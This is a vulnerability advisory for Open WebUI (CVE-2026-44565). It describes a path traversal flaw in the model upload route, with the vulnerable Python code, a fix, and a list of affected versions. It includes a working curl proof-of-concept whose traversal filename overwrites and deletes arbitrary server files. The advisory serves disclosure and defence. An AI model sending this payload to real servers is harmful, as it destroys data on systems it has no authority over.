GHSA-j3fw-wc48-29g3

Suggest an improvement
Source
https://github.com/advisories/GHSA-j3fw-wc48-29g3
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-j3fw-wc48-29g3/GHSA-j3fw-wc48-29g3.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-j3fw-wc48-29g3
Aliases
  • CVE-2026-44565
Published
2026-05-11T14:03:24Z
Modified
2026-05-11T14:16:39.013114Z
Severity
  • 8.1 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H CVSS Calculator
Summary
Open WebUI Arbitrary File Write, Delete via Path Traversal
Details

** CONFIDENTIAL **

Vulnerability Disclosure Analysis Documentation

Vulnerability Details

  1. Discoverer: Taylor Pennington of KoreLogic, Inc.
  2. Date Submitted: June 11, 2024
  3. Title: Open WebUI Arbitrary File Write, Delete via Path Traversal
  4. High-level Summary: Attacker controlled files can be uploaded to arbitrary locations on the web server's filesystem by abusing a path traversal vulnerability. After the file is written, it is deleted.
  5. Affected Vendor: Open WebUI
  6. Affected Product(s): Open WebUI (Formerly Ollama WebUI)
  7. Affected Version(s): 0.1.105
  8. Platform/OS: Debian GNU/Linux 12 (bookworm)
  9. Vector: HTTP web interface
  10. CWE: 22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
  11. Technical Analysis:

    When attaching files to a prompt by clicking the plus sign (+) on the left of the message input box when using the Open WebUI HTTP interface, the file is uploaded to a static upload directory. If the file is an audio file it will be sent to a second API that will attempt to transcribe it.

    The name of the file is derived from the original HTTP upload request and is not validated or sanitized. This allows for users to upload files with names containing dot-segments in the file path and traverse out of the intended uploads directory. Effectively, users can upload files anywhere on the filesystem the user running the web server has permission.

    This can be visualized by examining the python code for the "/ollama/models/upload" API route (https://github.com/open-webui/open-webui/blob/0399a69b73de9789c4221acedea70d528e1346c4/backend/apps/ollama/main.py#L1063-L1127):

    def upload_model(file: UploadFile = File(...), url_idx: Optional[int] = None):
     if url_idx == None:
         url_idx = 0
     ollama_url = app.state.OLLAMA_BASE_URLS[url_idx]
    
     file_path = f"{UPLOAD_DIR}/{file.filename}"
    
     # Save file in chunks
     with open(file_path, "wb+") as f:
         for chunk in file.file:
             f.write(chunk)
    
     def file_process_stream():
         nonlocal ollama_url
         total_size = os.path.getsize(file_path)
         chunk_size = 1024 * 1024
         try:
             with open(file_path, "rb") as f:
                 total = 0
                 done = False
    
                 while not done:
                     chunk = f.read(chunk_size)
                     if not chunk:
                         done = True
                         continue
    
                     total += len(chunk)
                     progress = round((total / total_size) * 100, 2)
    
                     res = {
                         "progress": progress,
                         "total": total_size,
                         "completed": total,
                     }
                     yield f"data: {json.dumps(res)}\n\n"
    
                 if done:
                     f.seek(0)
                     hashed = calculate_sha256(f)
                     f.seek(0)
    
                     url = f"{ollama_url}/api/blobs/sha256:{hashed}"
                     response = requests.post(url, data=f)
    
                     if response.ok:
                         res = {
                             "done": done,
                             "blob": f"sha256:{hashed}",
                             "name": file.filename,
                         }
                         os.remove(file_path)
                         yield f"data: {json.dumps(res)}\n\n"
                     else:
                         raise Exception(
                             "Ollama: Could not create blob, Please try again."
                         )
    
         except Exception as e:
             res = {"error": str(e)}
             yield f"data: {json.dumps(res)}\n\n"
    
     return StreamingResponse(file_process_stream(), media_type="text/event-stream")
    
    

    The model is temporarily written to disk in chunks and then the data is sent to another internal API. Once the file is successfully passed, the file is removed from the disk. Note line 1116, os.remove(file_path).

    This has an affect of stomping on and ultimately deleting any file that the user of the open-webui service has permissions over.

    It may be possible to continue sending chunks to the file slowly and create a race condition however, this was not validated.

  12. Proof-of-Concept:

    First, create a file under the /tmp directory named DELETE_ME while logged in as the user account of the web application or chown the file to be owned by the open-webui user.

    # su ollama
    # touch /tmp/DELETE_ME
     

    Execute the following cURL command after replacing the exported JWT value for a valid user session:

    export JWT="JWT_HERE"; curl -s -X $'POST' \
    -H $'Host: openwebui.example.com' -H $'Content-Length: 206' -H "Authorization: Bearer ${JWT}" -H $'Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW' \
    --data-binary $'------WebKitFormBoundary7MA4YWxkTrZu0gW\x0d\x0aContent-Disposition: form-data; name=\"file\"; filename=\"../../../../../../../tmp/DELETE_ME\"\x0d\x0aContent-Type: image/png\x0d\x0a\x0d\x0a\x0d\x0a------WebKitFormBoundary7MA4YWxkTrZu0gW--' \
    $'https://openwebui.example.com/ollama/models/upload'
     

    Verify that /tmp/DELETE_ME has been deleted.

  13. Mitigation Recommendation: Modify line 1070 (https://github.com/open-webui/open-webui/blob/0399a69b73de9789c4221acedea70d528e1346c4/backend/apps/ollama/main.py#L1070) to:

filename = os.path.basename(file.filename)
file_path = f"{UPLOAD_DIR}/{filename}"
Database specific
{
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-11T14:03:24Z",
    "cwe_ids": [
        "CWE-22"
    ],
    "severity": "HIGH",
    "nvd_published_at": null
}
References

Affected packages

PyPI / open-webui

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
0.6.10

Affected versions

0.*
0.1.124
0.1.125
0.2.0
0.2.1
0.2.2
0.2.3
0.2.4
0.2.5
0.3.0
0.3.1
0.3.2
0.3.3
0.3.4
0.3.5
0.3.6
0.3.7
0.3.8
0.3.9
0.3.10
0.3.12
0.3.13
0.3.14
0.3.15
0.3.16
0.3.17.dev2
0.3.17.dev3
0.3.17.dev4
0.3.17.dev5
0.3.17
0.3.18
0.3.19
0.3.20
0.3.21
0.3.22
0.3.23
0.3.24
0.3.25
0.3.26
0.3.27.dev1
0.3.27.dev2
0.3.27.dev3
0.3.27
0.3.28
0.3.29
0.3.30.dev1
0.3.30.dev2
0.3.30
0.3.31.dev1
0.3.31
0.3.32
0.3.33.dev1
0.3.33
0.3.34
0.3.35
0.4.0.dev1
0.4.0.dev2
0.4.0
0.4.1
0.4.2
0.4.3
0.4.4
0.4.5
0.4.6.dev1
0.4.6
0.4.7
0.4.8
0.5.0.dev1
0.5.0.dev2
0.5.0
0.5.1
0.5.2
0.5.3.dev1
0.5.3
0.5.4
0.5.5
0.5.6
0.5.7
0.5.8
0.5.9
0.5.10
0.5.11
0.5.12
0.5.13
0.5.14
0.5.15
0.5.16
0.5.17
0.5.18
0.5.19
0.5.20
0.6.0
0.6.1
0.6.2
0.6.3
0.6.4
0.6.5
0.6.6.dev1
0.6.6
0.6.7
0.6.8
0.6.9

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-j3fw-wc48-29g3/GHSA-j3fw-wc48-29g3.json"
last_known_affected_version_range
"<= 0.6.9"